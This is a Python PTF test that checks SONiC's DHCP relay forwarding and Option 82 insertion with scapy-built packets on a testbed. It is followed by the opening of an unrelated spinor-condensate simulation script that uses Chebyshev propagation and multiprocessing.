This test simulates a new host booting up on the VLAN network of a ToR and
requesting an IP address via DHCP. Setup is as follows:
- DHCP client is simulated by listening/sending on an interface connected to VLAN of ToR.
- DHCP server is simulated by listening/sending on injected PTF interfaces which link
ToR to leaves. This way we can listen for traffic sent from DHCP relay out to would-be DHCP servers
This test performs the following functionality:
1.) Simulated client broadcasts a DHCPDISCOVER message
2.) Verify DHCP relay running on ToR receives the DHCPDISCOVER message
and relays it to all of its known DHCP servers, appending the proper Option 82 information
3.) Simulate DHCPOFFER message broadcast from a DHCP server to the ToR
4.) Verify DHCP relay receives the DHCPOFFER message and forwards it to our
simulated client.
5.) Simulated client broadcasts a DHCPREQUEST message
6.) Verify DHCP relay running on ToR receives the DHCPREQUEST message
and relays it to all of its known DHCP servers, appending the proper Option 82 information
7.) Simulate DHCPACK message sent from a DHCP server to the ToR
8.) Verify DHCP relay receives the DHCPACK message and forwards it to our
simulated client.
To run: place the following in a shell script (this will test against str-s6000-acs-12 (ec:f4:bb:fe:88:0a)):
ptf --test-dir ptftests dhcp_relay_test.DHCPTest --platform remote -t "hostname=\"str-s6000-acs-12\"; client_port_index=\"1\"; client_iface_alias=\"fortyGigE0/4\"; leaf_port_indices=\"[29, 31, 28, 30]\"; num_dhcp_servers=\"48\"; server_ip=\"192.0.0.1\"; relay_iface_ip=\"192.168.0.1\"; relay_iface_mac=\"ec:f4:bb:fe:88:0a\"; relay_iface_netmask=\"255.255.255.224\"" --disable-vxlan --disable-geneve --disable-erspan --disable-mpls --disable-nvgre
The above command is configured to test with the following configuration:
- VLAN IP of DuT is 192.168.0.1, MAC address is ec:f4:bb:fe:88:0a (this is configured to test against str-s6000-acs-12)
- Simulated client will live on PTF interface eth4 (interface number 4)
- Assumes leaf switches are connected to injected PTF interfaces 28, 29, 30, 31
- Test will simulate replies from server with IP '192.0.0.1'
- Simulated server will offer simulated client IP '192.168.0.2' with a subnet of '255.255.255.0' (this should be in the VLAN of DuT)
DHCP Relay currently installed with SONiC is isc-dhcp-relay
TODO???:
1) DHCP Renew Test
2) DHCP NACK Test
3) Test with multiple DHCP Servers
"""
class DHCPTest(DataplaneBaseTest):
BROADCAST_MAC = 'ff:ff:ff:ff:ff:ff'
BROADCAST_IP = '255.255.255.255'
DEFAULT_ROUTE_IP = '0.0.0.0'
DHCP_CLIENT_PORT = 68
DHCP_SERVER_PORT = 67
DHCP_LEASE_TIME_OFFSET = 292
DHCP_LEASE_TIME_LEN = 6
LEASE_TIME = 86400
DHCP_PKT_BOOTP_MIN_LEN = 300
def __init__(self):
DataplaneBaseTest.__init__(self)
def setUp(self):
DataplaneBaseTest.setUp(self)
self.test_params = testutils.test_params_get()
self.hostname = self.test_params['hostname']
self.verified_option82 = False
if 'other_client_port' in self.test_params:
self.other_client_port = ast.literal_eval(self.test_params['other_client_port'])
# These are the interfaces we are injected into that link to out leaf switches
self.server_port_indices = ast.literal_eval(self.test_params['leaf_port_indices'])
self.num_dhcp_servers = int(self.test_params['num_dhcp_servers'])
self.assertTrue(self.num_dhcp_servers > 0,
"Error: This test requires at least one DHCP server to be specified!")
# We will simulate a responding DHCP server on the first interface in the provided set
self.server_ip = self.test_params['server_ip']
self.server_iface_mac = self.dataplane.get_mac(0, self.server_port_indices[0])
self.relay_iface_ip = self.test_params['relay_iface_ip']
self.relay_iface_mac = self.test_params['relay_iface_mac']
self.client_iface_alias = self.test_params['client_iface_alias']
self.client_port_index = int(self.test_params['client_port_index'])
self.client_mac = self.dataplane.get_mac(0, self.client_port_index)
self.switch_loopback_ip = self.test_params['switch_loopback_ip']
self.uplink_mac = self.test_params['uplink_mac']
# 'dual' for dual tor testing
# 'single' for regular single tor testing
self.dual_tor = (self.test_params['testing_mode'] == 'dual')
self.testbed_mode = self.test_params['testbed_mode']
# option82 is a byte string created by the relay agent. It contains the circuit_id and remote_id fields.
# circuit_id is stored as suboption 1 of option 82.
# It consists of the following:
# Byte 0: Suboption number, always set to 1
# Byte 1: Length of suboption data in bytes
# Bytes 2+: Suboption data
# Our circuit_id string is of the form "hostname:portname"
circuit_id_string = self.hostname + ":" + self.client_iface_alias
self.option82 = struct.pack('BB', 1, len(circuit_id_string))
self.option82 += circuit_id_string.encode('utf-8')
# remote_id is stored as suboption 2 of option 82.
# It consists of the following:
# Byte 0: Suboption number, always set to 2
# Byte 1: Length of suboption data in bytes
# Bytes 2+: Suboption data
# Our remote_id string simply consists of the MAC address of the port that received the request
remote_id_string = self.relay_iface_mac
self.option82 += struct.pack('BB', 2, len(remote_id_string))
self.option82 += remote_id_string.encode('utf-8')
# In 'dual' testing mode, vlan ip is stored as suboption 5 of option 82.
# It consists of the following:
# Byte 0: Suboption number, always set to 5
# Byte 1: Length of suboption data in bytes, always set to 4 (ipv4 addr has 4 bytes)
# Bytes 2+: vlan ip addr
if self.dual_tor:
link_selection = bytes(list(map(int, self.relay_iface_ip.split('.'))))
self.option82 += struct.pack('BB', 5, 4)
self.option82 += link_selection
# We'll assign our client the IP address 1 greater than our relay interface (i.e., gateway) IP
self.client_ip = incrementIpAddress(self.relay_iface_ip, 1)
self.client_subnet = self.test_params['relay_iface_netmask']
self.dest_mac_address = self.test_params['dest_mac_address']
self.client_udp_src_port = self.test_params['client_udp_src_port']
def tearDown(self):
DataplaneBaseTest.tearDown(self)
"""
Packet generation functions/wrappers
"""
def create_dhcp_discover_packet(self, dst_mac=BROADCAST_MAC, src_port=DHCP_CLIENT_PORT):
discover_packet = testutils.dhcp_discover_packet(eth_client=self.client_mac, set_broadcast_bit=True)
discover_packet[scapy.Ether].dst = dst_mac
discover_packet[scapy.IP].sport = src_port
if dst_mac != self.BROADCAST_MAC:
discover_packet[scapy.IP].dst = self.switch_loopback_ip
discover_packet[scapy.IP].src = self.client_ip
return discover_packet
def create_dhcp_discover_relayed_packet(self):
my_chaddr = binascii.unhexlify(self.client_mac.replace(':', ''))
my_chaddr += b'\x00\x00\x00\x00\x00\x00'
# Relay modifies the DHCPDISCOVER message in the following ways:
# 1.) Increments the hops count in the DHCP header
# 2.) Updates the gateway IP address in hte BOOTP header (if it is 0.0.0.0)
# 3.) Replaces the source IP with the IP of the interface which the relay
# received the broadcast DHCPDISCOVER message on
# 4.) Replaces the destination IP with the IP address of the DHCP server
# each message is being forwarded to
# Here, the actual destination MAC should be the MAC of the leaf the relay
# forwards through and the destination IP should be the IP of the DHCP server
# the relay is forwarding to. We don't need to confirm these, so we'll
# just mask them off later
#
# TODO: In IP layer, DHCP relay also replaces source IP with IP of interface on
# which it received the broadcast DHCPDISCOVER from client. This appears to
# be loopback. We could pull from minigraph and check here.
ether = scapy.Ether(dst=self.BROADCAST_MAC, src=self.uplink_mac, type=0x0800)
ip = scapy.IP(src=self.DEFAULT_ROUTE_IP, dst=self.BROADCAST_IP, len=328, ttl=64)
udp = scapy.UDP(sport=self.DHCP_SERVER_PORT, dport=self.DHCP_SERVER_PORT, len=308)
bootp = scapy.BOOTP(op=1,
htype=1,
hlen=6,
hops=1,
xid=0,
secs=0,
flags=0x8000,
ciaddr=self.DEFAULT_ROUTE_IP,
yiaddr=self.DEFAULT_ROUTE_IP,
siaddr=self.DEFAULT_ROUTE_IP,
giaddr=self.relay_iface_ip if not self.dual_tor else self.switch_loopback_ip,
chaddr=my_chaddr)
bootp /= scapy.DHCP(options=[('message-type', 'discover'),
(82, self.option82),
('end')])
# If our bootp layer is too small, pad it
pad_bytes = self.DHCP_PKT_BOOTP_MIN_LEN - len(bootp)
if pad_bytes > 0:
bootp /= scapy.PADDING('\x00' * pad_bytes)
pkt = ether / ip / udp / bootp
return pkt
def create_dhcp_offer_packet(self):
return testutils.dhcp_offer_packet(eth_server=self.server_iface_mac,
eth_dst=self.uplink_mac,
eth_client=self.client_mac,
ip_server=self.server_ip,
ip_dst=self.relay_iface_ip if not self.dual_tor else self.switch_loopback_ip,
ip_offered=self.client_ip,
port_dst=self.DHCP_SERVER_PORT,
ip_gateway=self.relay_iface_ip if not self.dual_tor else self.switch_loopback_ip,
netmask_client=self.client_subnet,
dhcp_lease=self.LEASE_TIME,
padding_bytes=0,
set_broadcast_bit=True)
def create_dhcp_offer_relayed_packet(self):
my_chaddr = binascii.unhexlify(self.client_mac.replace(':', ''))
my_chaddr += b'\x00\x00\x00\x00\x00\x00'
# Relay modifies the DHCPOFFER message in the following ways:
# 1.) Replaces the source MAC with the MAC of the interface it received it on
# 2.) Replaces the destination MAC with boradcast (ff:ff:ff:ff:ff:ff)
# 3.) Replaces the source IP with the IP of the interface which the relay
# received it on
# 4.) Replaces the destination IP with broadcast (255.255.255.255)
# 5.) Replaces the destination port with the DHCP client port (68)
ether = scapy.Ether(dst=self.BROADCAST_MAC, src=self.relay_iface_mac, type=0x0800)
ip = scapy.IP(src=self.relay_iface_ip, dst=self.BROADCAST_IP, len=290, ttl=64)
udp = scapy.UDP(sport=self.DHCP_SERVER_PORT, dport=self.DHCP_CLIENT_PORT, len=262)
bootp = scapy.BOOTP(op=2,
htype=1,
hlen=6,
hops=0,
xid=0,
secs=0,
flags=0x8000,
ciaddr=self.DEFAULT_ROUTE_IP,
yiaddr=self.client_ip,
siaddr=self.server_ip,
giaddr=self.relay_iface_ip if not self.dual_tor else self.switch_loopback_ip,
chaddr=my_chaddr)
bootp /= scapy.DHCP(options=[('message-type', 'offer'),
('server_id', self.server_ip),
('lease_time', self.LEASE_TIME),
('subnet_mask', self.client_subnet),
('end')])
# TODO: Need to add this to the packet creation functions in PTF code first!
# If our bootp layer is too small, pad it
#pad_bytes = self.DHCP_PKT_BOOTP_MIN_LEN - len(bootp)
#if pad_bytes > 0:
# bootp /= scapy.PADDING('\x00' * pad_bytes)
pkt = ether / ip / udp / bootp
return pkt
def create_dhcp_request_packet(self, dst_mac=BROADCAST_MAC, src_port=DHCP_CLIENT_PORT):
request_packet = testutils.dhcp_request_packet(
eth_client=self.client_mac,
ip_server=self.server_ip,
ip_requested=self.client_ip,
set_broadcast_bit=True
)
request_packet[scapy.Ether].dst = dst_mac
request_packet[scapy.IP].sport = src_port
if dst_mac != self.BROADCAST_MAC:
request_packet[scapy.IP].dst = self.switch_loopback_ip
request_packet[scapy.IP].src = self.client_ip
return request_packet
def create_dhcp_request_relayed_packet(self):
my_chaddr = binascii.unhexlify(self.client_mac.replace(':', ''))
my_chaddr += b'\x00\x00\x00\x00\x00\x00'
# Here, the actual destination MAC should be the MAC of the leaf the relay
# forwards through and the destination IP should be the IP of the DHCP server
# the relay is forwarding to. We don't need to confirm these, so we'll
# just mask them off later
#
# TODO: In IP layer, DHCP relay also replaces source IP with IP of interface on
# which it received the broadcast DHCPREQUEST from client. This appears to
# be loopback. We could pull from minigraph and check here.
ether = scapy.Ether(dst=self.BROADCAST_MAC, src=self.uplink_mac, type=0x0800)
ip = scapy.IP(src=self.DEFAULT_ROUTE_IP, dst=self.BROADCAST_IP, len=336, ttl=64)
udp = scapy.UDP(sport=self.DHCP_SERVER_PORT, dport=self.DHCP_SERVER_PORT, len=316)
bootp = scapy.BOOTP(op=1,
htype=1,
hlen=6,
hops=1,
xid=0,
secs=0,
flags=0x8000,
ciaddr=self.DEFAULT_ROUTE_IP,
yiaddr=self.DEFAULT_ROUTE_IP,
siaddr=self.DEFAULT_ROUTE_IP,
giaddr=self.relay_iface_ip if not self.dual_tor else self.switch_loopback_ip,
chaddr=my_chaddr)
bootp /= scapy.DHCP(options=[('message-type', 'request'),
('requested_addr', self.client_ip),
('server_id', self.server_ip),
(82, self.option82),
('end')])
# If our bootp layer is too small, pad it
pad_bytes = self.DHCP_PKT_BOOTP_MIN_LEN - len(bootp)
if pad_bytes > 0:
bootp /= scapy.PADDING('\x00' * pad_bytes)
pkt = ether / ip / udp / bootp
return pkt
def create_dhcp_ack_packet(self):
return testutils.dhcp_ack_packet(eth_server=self.server_iface_mac,
eth_dst=self.uplink_mac,
eth_client=self.client_mac,
ip_server=self.server_ip,
ip_dst=self.relay_iface_ip if not self.dual_tor else self.switch_loopback_ip,
ip_offered=self.client_ip,
port_dst=self.DHCP_SERVER_PORT,
ip_gateway=self.relay_iface_ip if not self.dual_tor else self.switch_loopback_ip,
netmask_client=self.client_subnet,
dhcp_lease=self.LEASE_TIME,
padding_bytes=0,
set_broadcast_bit=True)
def create_dhcp_ack_relayed_packet(self):
my_chaddr = binascii.unhexlify(self.client_mac.replace(':', ''))
my_chaddr += b'\x00\x00\x00\x00\x00\x00'
# Relay modifies the DHCPACK message in the following ways:
# 1.) Replaces the source MAC with the MAC of the interface it received it on
# 2.) Replaces the destination MAC with boradcast (ff:ff:ff:ff:ff:ff)
# 3.) Replaces the source IP with the IP of the interface which the relay
# received it on
# 4.) Replaces the destination IP with broadcast (255.255.255.255)
# 5.) Replaces the destination port with the DHCP client port (68)
ether = scapy.Ether(dst=self.BROADCAST_MAC, src=self.relay_iface_mac, type=0x0800)
ip = scapy.IP(src=self.relay_iface_ip, dst=self.BROADCAST_IP, len=290, ttl=64)
udp = scapy.UDP(sport=self.DHCP_SERVER_PORT, dport=self.DHCP_CLIENT_PORT, len=262)
bootp = scapy.BOOTP(op=2,
htype=1,
hlen=6,
hops=0,
xid=0,
secs=0,
flags=0x8000,
ciaddr=self.DEFAULT_ROUTE_IP,
yiaddr=self.client_ip,
siaddr=self.server_ip,
giaddr=self.relay_iface_ip if not self.dual_tor else self.switch_loopback_ip,
chaddr=my_chaddr)
bootp /= scapy.DHCP(options=[('message-type', 'ack'),
('server_id', self.server_ip),
('lease_time', self.LEASE_TIME),
('subnet_mask', self.client_subnet),
('end')])
# TODO: Need to add this to the packet creation functions in PTF code first!
# If our bootp layer is too small, pad it
#pad_bytes = self.DHCP_PKT_BOOTP_MIN_LEN - len(bootp)
#if pad_bytes > 0:
# bootp /= scapy.PADDING('\x00' * pad_bytes)
pkt = ether / ip / udp / bootp
return pkt
"""
Send/receive functions
"""
# Simulate client coming on VLAN and broadcasting a DHCPDISCOVER message
def client_send_discover(self, dst_mac=BROADCAST_MAC, src_port=DHCP_CLIENT_PORT):
# Form and send DHCPDISCOVER packet
dhcp_discover = self.create_dhcp_discover_packet(dst_mac, src_port)
testutils.send_packet(self, self.client_port_index, dhcp_discover)
#Verify the relayed packet has option82 info or not. Sniffing for the relayed packet on leaves and
#once the packet is recieved checking for the destination and looking into options and verifying
#the option82 info
def pkt_callback(self, pkt):
if pkt.haslayer(scapy2.IP) and pkt.haslayer(scapy2.DHCP):
if pkt.getlayer(scapy2.IP).dst in [self.server_ip] and pkt.getlayer(scapy2.DHCP) is not None:
self.verified_option82 = False
pkt_options = ''
for option in pkt.getlayer(scapy2.DHCP).options:
if option[0] == 'relay_agent_information':
pkt_options = option[1]
break
if self.option82 in pkt_options:
self.verified_option82 = True
def Sniffer(self,iface):
scapy2.sniff(iface=iface, filter="udp and (port 67 or 68)",prn=self.pkt_callback, store=0, timeout=3)
# Verify that the DHCP relay actually received and relayed the DHCPDISCOVER message to all of
# its known DHCP servers. We also verify that the relay inserted Option 82 information in the
# packet.
def verify_relayed_discover(self):
# Create a packet resembling a relayed DCHPDISCOVER packet
dhcp_discover_relayed = self.create_dhcp_discover_relayed_packet()
# Mask off fields we don't care about matching
masked_discover = Mask(dhcp_discover_relayed)
masked_discover.set_do_not_care_scapy(scapy.Ether, "dst")
masked_discover.set_do_not_care_scapy(scapy.IP, "version")
masked_discover.set_do_not_care_scapy(scapy.IP, "ihl")
masked_discover.set_do_not_care_scapy(scapy.IP, "tos")
masked_discover.set_do_not_care_scapy(scapy.IP, "len")
masked_discover.set_do_not_care_scapy(scapy.IP, "id")
masked_discover.set_do_not_care_scapy(scapy.IP, "flags")
masked_discover.set_do_not_care_scapy(scapy.IP, "frag")
masked_discover.set_do_not_care_scapy(scapy.IP, "ttl")
masked_discover.set_do_not_care_scapy(scapy.IP, "proto")
masked_discover.set_do_not_care_scapy(scapy.IP, "chksum")
masked_discover.set_do_not_care_scapy(scapy.IP, "src")
masked_discover.set_do_not_care_scapy(scapy.IP, "dst")
masked_discover.set_do_not_care_scapy(scapy.IP, "options")
masked_discover.set_do_not_care_scapy(scapy.UDP, "chksum")
masked_discover.set_do_not_care_scapy(scapy.UDP, "len")
masked_discover.set_do_not_care_scapy(scapy.BOOTP, "sname")
masked_discover.set_do_not_care_scapy(scapy.BOOTP, "file")
# Count the number of these packets received on the ports connected to our leaves
num_expected_packets = self.num_dhcp_servers
discover_count = testutils.count_matched_packets_all_ports(self, masked_discover, self.server_port_indices)
self.assertTrue(discover_count == num_expected_packets,
"Failed: Discover count of %d != %d" % (discover_count, num_expected_packets))
# Simulate a DHCP server sending a DHCPOFFER message to client.
# We do this by injecting a DHCPOFFER message on the link connected to one
# of our leaf switches.
def server_send_offer(self):
dhcp_offer = self.create_dhcp_offer_packet()
testutils.send_packet(self, self.server_port_indices[0], dhcp_offer)
# Verify that the DHCPOFFER would be received by our simulated client
def verify_offer_received(self):
dhcp_offer = self.create_dhcp_offer_relayed_packet()
masked_offer = Mask(dhcp_offer)
masked_offer.set_do_not_care_scapy(scapy.IP, "version")
masked_offer.set_do_not_care_scapy(scapy.IP, "ihl")
masked_offer.set_do_not_care_scapy(scapy.IP, "tos")
masked_offer.set_do_not_care_scapy(scapy.IP, "len")
masked_offer.set_do_not_care_scapy(scapy.IP, "id")
masked_offer.set_do_not_care_scapy(scapy.IP, "flags")
masked_offer.set_do_not_care_scapy(scapy.IP, "frag")
masked_offer.set_do_not_care_scapy(scapy.IP, "ttl")
masked_offer.set_do_not_care_scapy(scapy.IP, "proto")
masked_offer.set_do_not_care_scapy(scapy.IP, "chksum")
masked_offer.set_do_not_care_scapy(scapy.IP, "options")
masked_offer.set_do_not_care_scapy(scapy.UDP, "len")
masked_offer.set_do_not_care_scapy(scapy.UDP, "chksum")
masked_offer.set_do_not_care_scapy(scapy.BOOTP, "sname")
masked_offer.set_do_not_care_scapy(scapy.BOOTP, "file")
# NOTE: verify_packet() will fail for us via an assert, so no need to check a return value here
testutils.verify_packet(self, masked_offer, self.client_port_index)
# Simulate our client sending a DHCPREQUEST message
def client_send_request(self, dst_mac=BROADCAST_MAC, src_port=DHCP_CLIENT_PORT):
dhcp_request = self.create_dhcp_request_packet(dst_mac, src_port)
testutils.send_packet(self, self.client_port_index, dhcp_request)
# Verify that the DHCP relay actually received and relayed the DHCPREQUEST message to all of
# its known DHCP servers. We also verify that the relay inserted Option 82 information in the
# packet.
def verify_relayed_request(self):
# Create a packet resembling a relayed DCHPREQUEST packet
dhcp_request_relayed = self.create_dhcp_request_relayed_packet()
# Mask off fields we don't care about matching
masked_request = Mask(dhcp_request_relayed)
masked_request.set_do_not_care_scapy(scapy.Ether, "dst")
masked_request.set_do_not_care_scapy(scapy.IP, "version")
masked_request.set_do_not_care_scapy(scapy.IP, "ihl")
masked_request.set_do_not_care_scapy(scapy.IP, "tos")
masked_request.set_do_not_care_scapy(scapy.IP, "len")
masked_request.set_do_not_care_scapy(scapy.IP, "id")
masked_request.set_do_not_care_scapy(scapy.IP, "flags")
masked_request.set_do_not_care_scapy(scapy.IP, "frag")
masked_request.set_do_not_care_scapy(scapy.IP, "ttl")
masked_request.set_do_not_care_scapy(scapy.IP, "proto")
masked_request.set_do_not_care_scapy(scapy.IP, "chksum")
masked_request.set_do_not_care_scapy(scapy.IP, "src")
masked_request.set_do_not_care_scapy(scapy.IP, "dst")
masked_request.set_do_not_care_scapy(scapy.IP, "options")
masked_request.set_do_not_care_scapy(scapy.UDP, "chksum")
masked_request.set_do_not_care_scapy(scapy.UDP, "len")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "sname")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "file")
# Count the number of these packets received on the ports connected to our leaves
num_expected_packets = self.num_dhcp_servers
request_count = testutils.count_matched_packets_all_ports(self, masked_request, self.server_port_indices)
self.assertTrue(request_count == num_expected_packets,
"Failed: Request count of %d != %d" % (request_count, num_expected_packets))
# Simulate a DHCP server sending a DHCPOFFER message to client from one of our leaves
def server_send_ack(self):
dhcp_ack = self.create_dhcp_ack_packet()
testutils.send_packet(self, self.server_port_indices[0], dhcp_ack)
# Verify that the DHCPACK would be received by our simulated client
def verify_ack_received(self):
dhcp_ack = self.create_dhcp_ack_relayed_packet()
masked_ack = Mask(dhcp_ack)
masked_ack.set_do_not_care_scapy(scapy.IP, "version")
masked_ack.set_do_not_care_scapy(scapy.IP, "ihl")
masked_ack.set_do_not_care_scapy(scapy.IP, "tos")
masked_ack.set_do_not_care_scapy(scapy.IP, "len")
masked_ack.set_do_not_care_scapy(scapy.IP, "id")
masked_ack.set_do_not_care_scapy(scapy.IP, "flags")
masked_ack.set_do_not_care_scapy(scapy.IP, "frag")
masked_ack.set_do_not_care_scapy(scapy.IP, "ttl")
masked_ack.set_do_not_care_scapy(scapy.IP, "proto")
masked_ack.set_do_not_care_scapy(scapy.IP, "chksum")
masked_ack.set_do_not_care_scapy(scapy.IP, "options")
masked_ack.set_do_not_care_scapy(scapy.UDP, "len")
masked_ack.set_do_not_care_scapy(scapy.UDP, "chksum")
masked_ack.set_do_not_care_scapy(scapy.BOOTP, "sname")
masked_ack.set_do_not_care_scapy(scapy.BOOTP, "file")
# NOTE: verify_packet() will fail for us via an assert, so no need to check a return value here
testutils.verify_packet(self, masked_ack, self.client_port_index)
def verify_dhcp_relay_pkt_on_other_client_port_with_no_padding(self, dst_mac=BROADCAST_MAC, src_port=DHCP_CLIENT_PORT):
# Form and send DHCP Relay packet
dhcp_request = self.create_dhcp_request_packet(dst_mac, src_port)
testutils.send_packet(self, self.client_port_index, dhcp_request)
# Mask off fields we don't care about matching
masked_request = Mask(dhcp_request)
masked_request.set_do_not_care_scapy(scapy.Ether, "src")
masked_request.set_do_not_care_scapy(scapy.IP, "version")
masked_request.set_do_not_care_scapy(scapy.IP, "ihl")
masked_request.set_do_not_care_scapy(scapy.IP, "tos")
masked_request.set_do_not_care_scapy(scapy.IP, "len")
masked_request.set_do_not_care_scapy(scapy.IP, "id")
masked_request.set_do_not_care_scapy(scapy.IP, "flags")
masked_request.set_do_not_care_scapy(scapy.IP, "frag")
masked_request.set_do_not_care_scapy(scapy.IP, "ttl")
masked_request.set_do_not_care_scapy(scapy.IP, "proto")
masked_request.set_do_not_care_scapy(scapy.IP, "chksum")
masked_request.set_do_not_care_scapy(scapy.IP, "src")
masked_request.set_do_not_care_scapy(scapy.IP, "dst")
masked_request.set_do_not_care_scapy(scapy.IP, "options")
masked_request.set_do_not_care_scapy(scapy.UDP, "chksum")
masked_request.set_do_not_care_scapy(scapy.UDP, "len")
masked_request.set_do_not_care_scapy(scapy.DHCP, "options")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "sname")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "file")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "yiaddr")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "ciaddr")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "siaddr")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "giaddr")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "chaddr")
try :
testutils.verify_packets_any(self, masked_request, self.other_client_port)
except Exception:
self.assertTrue(False,"DHCP Relay packet not matched or Padded extra on client side")
def verify_dhcp_relay_pkt_on_server_port_with_no_padding(self, dst_mac=BROADCAST_MAC, src_port=DHCP_CLIENT_PORT):
# Form and send DHCP Relay packet
dhcp_request = self.create_dhcp_request_packet(dst_mac, src_port)
testutils.send_packet(self, self.client_port_index, dhcp_request)
# Mask off fields we don't care about matching
# Create a packet resembling a relayed DCHPREQUEST packet
dhcp_request_relayed = self.create_dhcp_request_relayed_packet()
# Mask off fields we don't care about matching
masked_request = Mask(dhcp_request_relayed)
masked_request.set_do_not_care_scapy(scapy.Ether, "dst")
masked_request.set_do_not_care_scapy(scapy.IP, "version")
masked_request.set_do_not_care_scapy(scapy.IP, "ihl")
masked_request.set_do_not_care_scapy(scapy.IP, "tos")
masked_request.set_do_not_care_scapy(scapy.IP, "len")
masked_request.set_do_not_care_scapy(scapy.IP, "id")
masked_request.set_do_not_care_scapy(scapy.IP, "flags")
masked_request.set_do_not_care_scapy(scapy.IP, "frag")
masked_request.set_do_not_care_scapy(scapy.IP, "ttl")
masked_request.set_do_not_care_scapy(scapy.IP, "proto")
masked_request.set_do_not_care_scapy(scapy.IP, "chksum")
masked_request.set_do_not_care_scapy(scapy.IP, "src")
masked_request.set_do_not_care_scapy(scapy.IP, "dst")
masked_request.set_do_not_care_scapy(scapy.IP, "options")
masked_request.set_do_not_care_scapy(scapy.UDP, "chksum")
masked_request.set_do_not_care_scapy(scapy.UDP, "len")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "sname")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "file")
try :
testutils.verify_packets_any(self, masked_request, self.server_port_indices)
except Exception:
self.assertTrue(False,"DHCP Relay packet not matched or Padded extra on server side")
def runTest(self):
# Start sniffer process for each server port to capture DHCP packet
# and then verify option 82
for interface_index in self.server_port_indices:
t1 = Thread(target=self.Sniffer, args=("eth"+str(interface_index),))
t1.start()
self.client_send_discover(self.dest_mac_address, self.client_udp_src_port)
self.verify_relayed_discover()
self.server_send_offer()
self.verify_offer_received()
self.client_send_request(self.dest_mac_address, self.client_udp_src_port)
self.verify_relayed_request()
self.server_send_ack()
self.verify_ack_received()
self.assertTrue(self.verified_option82,"Failed: Verifying option 82")
## Below verification will be done only when client port is set in ptf_runner
if 'other_client_port' in self.test_params:
self.verify_dhcp_relay_pkt_on_other_client_port_with_no_padding(self.dest_mac_address, self.client_udp_src_port)
self.verify_dhcp_relay_pkt_on_server_port_with_no_padding(self.dest_mac_address, self.client_udp_src_port)
|
spinorf_multicore.py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 5 14:24:21 2015
This is the python version of spinorf with multicore processing
@author: zag
"""
import time as timemod
import numpy as np
import math
try:
import numba
from .chebyshev_functions_numba import setup_scaled_H, moments, find_norm
except ImportError:
from .chebyshev_functions import setup_scaled_H, moments, find_norm
from .chebyshev_functions import alpha_help, find_nmax
from multiprocessing import Process, Queue
# first we have initization variables
def calc_m_loop(queue, m, params):
"""calculate for specific magnetization"""
# uppack params dictionary, cant just do **params due to intricacy of call
n_tot = params['n_tot']
atom_range = params['atom_range']
emw = params['emw']
eqz = params['eqz']
c = params['c']
n_step = params['n_step']
delta_t = params['delta_t']
ndiv = params['ndiv']
alpha_minus = params['alpha_minus']
alpha_plus = params['alpha_plus']
alpha_zero = params['alpha_zero']
norm_factor = params['norm_factor']
norm_for_m = 0
# now declare local arrays, will be agreegated at end
sum_of_means = np.zeros(sum(n_step) + 1) # one for each time step
sum_of_meansq = np.zeros(sum(n_step) + 1)
norm = np.zeros(sum(n_step) + 1)
time = np.zeros(sum(n_step) + 1)
# alot arrays
for atom_n in range(n_tot - atom_range, n_tot + atom_range + 1):
if atom_n >= abs(m):
n_max = find_nmax(atom_n, m)
e_min, e_max, d, e, first_n0 = setup_scaled_H(eqz + emw[0], c[0], atom_n, m, n_max)
state = np.zeros(int(n_max), dtype=complex)
sum_coef = 0
# now loop over j
for j in range(int(n_max)):
n_zero_min = np.mod(atom_n - abs(m), 2)
n_zero = n_zero_min + 2 * j
n_minus = (atom_n - n_zero - m) / 2
n_plus = m + n_minus
if n_minus >= 0 and n_plus >= 0 and n_zero >= 0:
ln_minus = alpha_help(alpha_minus, n_minus)
ln_plus = alpha_help(alpha_plus, n_plus)
ln_zero = alpha_help(alpha_zero, n_zero)
sum_ln = ln_minus + ln_plus + ln_zero
ln_coef = sum_ln - norm_factor
state[j] = np.exp(ln_coef)
else:
state[j] = np.complex(0, 0)
# now do timestep loop
t = 0
t_step = 0
mean, mean_sq = moments(state, first_n0)
sum_of_meansq[t_step] += mean_sq
sum_of_means[t_step] += mean
sum_coef = find_norm(state)
norm_for_m += sum_coef
norm[t_step] += sum_coef
time[t_step] = t
t_step = t_step + 1
for interval in range(ndiv):
q = eqz + emw[interval]
e_min, e_max, d, e, first_n0 = setup_scaled_H(
q, c[interval], atom_n, m, n_max)
dt = delta_t[interval] / (n_step[interval]) # time step
scaled_dt = 2 * np.pi * (e_max - e_min) * dt / 2
t_local_scaled = 0
for i in range(n_step[interval]):
t = t + dt
t_local_scaled += scaled_dt
state = chebyshev_propagator(scaled_dt, state, n_max, e, d)
mean, mean_sq = moments(state, first_n0)
sum_of_meansq[t_step] += mean_sq
sum_of_means[t_step] += mean
sum_coef = find_norm(state)
norm_for_m += sum_coef
norm[t_step] += sum_coef
time[t_step] = t
t_step += 1
queue.put([time, sum_of_means, sum_of_meansq, norm])
def write_out(filename, b_field, n_0, c_init, n_tot, mag, mag_range, atom_range,
spinor_phase, init_state_solver, propogate, delta_t, emw, eqz,
c, n_step, sum_of_means, sum_of_meansq, norm, time):
"""Write out the simulation data file"""
outstring1 = '{:<15}{:<15}{:<15}{:<15}\n'
outstring = '{:<15.6e}{:<15.6e}{:<15.6e}{:<15.6e}\n'
infostring = '{:<20} = {:<15}\n'
with open(filename, 'w') as fp:
# write out parameters
fp.write(infostring.format('Species', '23Na'))
fp.write(infostring.format('B Field (muT)', b_field))
fp.write(infostring.format('N_0', n_0))
fp.write(infostring.format('C_init', c_init))
fp.write(infostring.format('Total Atom Number', n_tot))
fp.write(infostring.format('Magnetization', mag))
fp.write(infostring.format('Mag Range', mag_range))
fp.write(infostring.format('Atom Range', atom_range))
fp.write(infostring.format('Spinor Phase', spinor_phase))
fp.write(infostring.format('Initial State Solver', init_state_solver))
fp.write(infostring.format('Propogator', propogate) + '\n')
# write out the arrays
fp.write('{:<15}{:<15}{:<15}{:<15}{:<15}\n'.format('Delta t (s)',
'Emw(Hz)',
'q(Hz)',
'C(Hz)',
'num steps'))
